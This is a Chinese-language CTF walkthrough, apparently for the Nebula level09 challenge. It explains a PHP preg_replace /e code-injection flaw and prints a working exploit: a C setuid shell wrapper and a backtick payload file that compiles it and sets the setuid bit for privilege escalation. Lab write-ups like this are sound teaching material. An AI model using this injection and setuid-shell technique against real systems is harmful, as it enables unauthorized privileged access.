题目给出一段PHP代码:
<?php
function spam($email)
{
$email = preg_replace("/\./", " dot ", $email);
$email = preg_replace("/@/", " AT ", $email);
return $email;
}
function markup($filename, $use_me)
{
$contents = file_get_contents($filename);
$contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
$contents = preg_replace("/\[/", "<", $contents);
$contents = preg_replace("/\]/", ">", $contents);
return $contents;
}
$output = markup($argv[1], $argv[2]);
print $output;
?>
若输入参数符合[email (.*)]正则形式,则将@替换为 AT,将. 替换为dot。
漏洞是因为该正则表达式设置了/e选项,设置该选项后php会将正则替换后的结果作为代码执行。
依然在/home/level09目录下创建如下代码:
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/bash");
}
然后创建输入文件in.txt,内容如下:
[email "{${`gcc -o /home/flag09/level09 /home/level09/level09.c;chmod +s /home/flag09/level09`}}"]
运行程序:
/home/flag09/flag09 /home/level09/in.txt
将在/home/flag09目录下生成level09 可执行文件,运行即可。